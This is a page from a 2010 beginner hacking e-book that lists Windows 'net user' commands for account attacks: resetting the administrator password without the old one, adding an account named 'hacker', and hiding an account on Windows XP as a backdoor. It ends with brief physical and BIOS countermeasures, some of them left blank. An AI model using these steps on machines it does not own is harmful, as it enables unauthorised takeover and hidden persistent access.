Hacking For Beginners – Manthan Desai
2010
Windows User Account Attack
1) To See all the account present on the computer
Net user
2) To change the password without knowing the old password.
Net user administrator *
3) To make a new user account.
Net user hacker /add
4) To Delete the Existing user account.
Net user hacker /delete
5) To make a hidden account in computer.***** { Works only in windows XP}
Net user hacker /add
Net localgroup users hacker /delete
Note: - To login to this Hidden Account Press
Ctrl + Alt + Delete + Delete
And give the hidden user name in the user name password respectively.
And the above are to be executed in command prompt. And the hacker indicates the respective username. Or the name of the account.
Counter Measures of Windows Attack.
1)
Change the Boot Sequence in the BIOS setup. Keep Hard Disk As 1st boot drive, then CD/DVD drive as 2ndboot device & Removable port as the 3rd boot device.
Put the BIOS password.
Put the physical Lock behind the cabinet of PC. (Put Lock).
2)
3)
www.hackingtech.co.tv
Page 33